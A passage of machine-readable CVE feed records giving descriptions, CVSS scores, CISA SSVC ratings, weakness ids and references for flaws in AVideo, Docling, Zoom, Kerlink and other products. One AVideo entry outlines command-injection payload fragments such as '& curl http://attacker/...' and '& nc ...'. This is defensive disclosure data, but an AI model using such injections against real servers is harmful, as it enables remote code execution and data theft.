component."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","baseScore":5.7,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:41:34.051358Z","id":"CVE-2024-32387","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-200"},{"lang":"en","value":"CWE-798"}]}],"references":[{"url":"https://www.bdosecurity.de/de-de/advisories/cve-2024-32387","source":"cve@mitre.org"},{"url":"https://www.kerlink.com/","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2024-32389","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:18.777","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Buffer Overflow vulnerability in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the update URLs component."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:40:00.945384Z","id":"CVE-2024-32389","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-120"}]}],"references":[{"url":"https://www.bdosecurity.de/de-de/advisories/cve-2024-32389","source":"cve@mitre.org"},{"url":"https://www.kerlink.com/","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2024-34268","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:18.890","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"EQ-3 Eqiva CC-RT-BLE Bluetooth Smart Radiator Thermostat Firmware up to the latest version 1.46 was discovered to allow unsecured bluetooth connections. This vulnerability allows attackers to gain full access to the device without authentication."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:38:59.949620Z","id":"CVE-2024-34268","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-306"}]}],"references":[{"url":"https://www.bdosecurity.de/de-de/advisories/cve-2024-34268","source":"cve@mitre.org"},{"url":"https://www.eq-3.com","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-11889","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T21:17:19.050","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"SALTO ProAccess Space software using the tenancy feature / logical \npartition is vulnerable to a privilege escalation attack that could \nallow an authorized attacker to access any space managed by the affected\n product."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"SALTO","product":"ProAccess Space","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"6.13","versionType":"custom","status":"affected"},{"version":"6.13","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:21:04.700942Z","id":"CVE-2026-11889","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-07.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-07","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-33692","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T21:17:20.183","lastModified":"2026-07-17T18:36:41.143","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"WWBN AVideo is an open source video platform. Versions prior to 29.0 expose .env files to unauthenticated users through the official Docker compose configuration. The official docker-compose.yml mounts the entire project root directory as the Apache document root, causing  the .env file — which contains database credentials, admin passwords, and infrastructure configuration — to be served as a static file at /.env. No .htaccess rule or Apache configuration blocks access to dotfiles. Exploitation enables direct database access, admin panel takeover, and further lateral movement within the Docker network. This issue has been resolved in version 29.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"WWBN","product":"AVideo","versions":[{"version":"< 29.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:22:51.308688Z","id":"CVE-2026-33692","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://github.com/WWBN/AVideo/commit/7f418de1a95ab87bb8c8c3eb3702d71c351e098d","source":"security-advisories@github.com"},{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-wf69-r4mx-43rr","source":"security-advisories@github.com"},{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-wf69-r4mx-43rr","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-33731","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T21:17:20.317","lastModified":"2026-07-17T18:36:41.143","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"WWBN AVideo is an open source video platform. In versions prior to 29.0, the Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the attacker bypasses signature validation and credits arbitrary wallet balances to any user account via attacker-controlled payload fields. Three flaws combine into an exploit chain: signature bypass via OR logic (webhook.php:33), payload values override API-fetched values (AuthorizeNet.php:169-171, webhook.php:44-48) and a missing approval check (webhook.php:61-75). By forging payment metadata, an attacker can credit arbitrary amounts to any user's wallet without a corresponding payment and include a  plans_id  to activate premium subscriptions (webhook.php:86-134), enabling free access to all paid and premium content and causing direct revenue loss to the platform owner. This issue has been fixed in version 29.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"WWBN","product":"AVideo","versions":[{"version":"< 29.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T11:11:59.098349Z","id":"CVE-2026-33731","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-345"}]}],"references":[{"url":"https://github.com/WWBN/AVideo/commit/033e83ae904cacb99495dbea7cbcfb3738cf42e4","source":"security-advisories@github.com"},{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-95jh-7r58-xmxw","source":"security-advisories@github.com"},{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-95jh-7r58-xmxw","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-36425","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:20.450","lastModified":"2026-07-17T18:47:13.683","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An issue in OPSWAT AppRemover Driver (ardrv.sys) v2017.10.02.1551 and earlier in IOCTL handler 0x2420031. Any local user can open the device and send process termination requests without privilege validation."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:31:38.024888Z","id":"CVE-2026-36425","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-269"}]}],"references":[{"url":"https://github.com/redteamfortress/CVE-2026-36425","source":"cve@mitre.org"},{"url":"https://www.opswat.com/products/oesis-framework/application-removal","source":"cve@mitre.org"},{"url":"https://www.virustotal.com/gui/file/07c5209bf83065fe760f4fee4ed2308b0c523671f68ca73a3854c2c8c28c0541","source":"cve@mitre.org"},{"url":"https://www.virustotal.com/gui/file/2248347b2ec49f07268a44816ebb6265677093ec277f825de1a76700ab25e3bc","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-38158","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:20.567","lastModified":"2026-07-17T18:47:17.940","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A SQL injection vulnerability in the /ureport/datasource/previewData component of ureport v2.2.9 allows attackers to access sensitive database information via crafted SQL statements."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:35:08.940224Z","id":"CVE-2026-38158","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/musesix/cve/blob/main/ureport_sqli/ureport.md","source":"cve@mitre.org"},{"url":"https://github.com/youseries/ureport","source":"cve@mitre.org"},{"url":"https://github.com/musesix/cve/blob/main/ureport_sqli/ureport.md","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44019","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T21:17:20.917","lastModified":"2026-07-17T18:36:41.143","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Docling Core defines core data types and transformations for the document processing application Docling. In versions 2.5.0 and above, prior to 2.74.1, docling-core could allow local file:// image references and accepted inline data: content without a decoded-size limit. In applications that accept untrusted image references, this may allow access to local files readable by the process or excessive memory use from large inline payloads. This issue has been fixed in version 2.74.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"docling-project","product":"docling-core","versions":[{"version":">= 2.5.0, < 2.74.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:50:27.693934Z","id":"CVE-2026-44019","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-73"},{"lang":"en","value":"CWE-400"}]}],"references":[{"url":"https://github.com/docling-project/docling-core/releases/tag/v2.74.1","source":"security-advisories@github.com"},{"url":"https://github.com/docling-project/docling-core/security/advisories/GHSA-j5xp-7m2f-49jv","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44023","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T21:17:21.123","lastModified":"2026-07-17T19:17:13.553","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Docling Core defines core data types and transformations for the document processing application Docling. In versions 1.5.0 and above, prior to 2.74.1, docling-core did not sufficiently restrict remote request destinations and could resolve a server-provided Content-Disposition to a local path in an unsafe manner. In applications that accept untrusted URLs, this could allow SSRF attacks targeting local files outside the user-defined cache directory. This issue has been fixed in version 2.74.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"docling-project","product":"docling-core","versions":[{"version":">= 1.5.0, < 2.74.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:48:04.141576Z","id":"CVE-2026-44023","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"},{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/docling-project/docling-core/releases/tag/v2.74.1","source":"security-advisories@github.com"},{"url":"https://github.com/docling-project/docling-core/security/advisories/GHSA-jmmv-h3mp-59v8","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-53409","sourceIdentifier":"security@zoom.us","published":"2026-07-16T21:17:21.253","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Privilege Management in Zoom Rooms for Windows before version 7.1.0 may allow an authenticated user to conduct an escalation of privilege via local access."}],"affected":[{"source":"security@zoom.us","affectedData":[{"vendor":"Zoom Communications","product":"Zoom Rooms","defaultStatus":"unaffected","platforms":["Windows"],"versions":[{"version":"0","lessThan":"7.1.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@zoom.us","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:20:02.749973Z","id":"CVE-2026-53409","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@zoom.us","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://www.zoom.com/en/trust/security-bulletin/zsb-26011","source":"security@zoom.us"}]}},{"cve":{"id":"CVE-2026-53410","sourceIdentifier":"security@zoom.us","published":"2026-07-16T21:17:21.377","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A time-of-check to time-of-use (TOCTOU) race condition in the installation and uninstallation process of certain Zoom Clients for Windows could allow an authenticated local user to escalate privileges."}],"affected":[{"source":"security@zoom.us","affectedData":[{"vendor":"Zoom Communications","product":"Zoom Clients","defaultStatus":"unaffected","platforms":["Windows"],"versions":[{"version":"see references","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@zoom.us","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.0,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:19:38.363485Z","id":"CVE-2026-53410","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@zoom.us","type":"Secondary","description":[{"lang":"en","value":"CWE-367"}]}],"references":[{"url":"https://www.zoom.com/en/trust/security-bulletin/zsb-26012","source":"security@zoom.us"}]}},{"cve":{"id":"CVE-2026-55173","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T21:17:21.483","lastModified":"2026-07-17T18:36:41.143","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \\n, \\r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"WWBN","product":"AVideo","versions":[{"version":"<= 29.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:44:11.844066Z","id":"CVE-2026-55173","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f","source":"security-advisories@github.com"},{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-wc3f-xc32-435f","source":"security-advisories@github.com"},{"url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-wc3f-xc32-435f","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-57896","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T21:17:21.617","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds read vulnerability in the Productivity Suite allows a \nlocal attacker to trigger kernel memory corruption by sending a crafted \nIOCTL request. This could lead to limited information disclosure or \ndisruption of the affected product."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"AutomationDirect","product":"Productivity Suite","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"v4.6.2.2","versionType":"custom","status":"affected"},{"version":"v4.7.0.47","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:16:30.492759Z","id":"CVE-2026-57896","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA 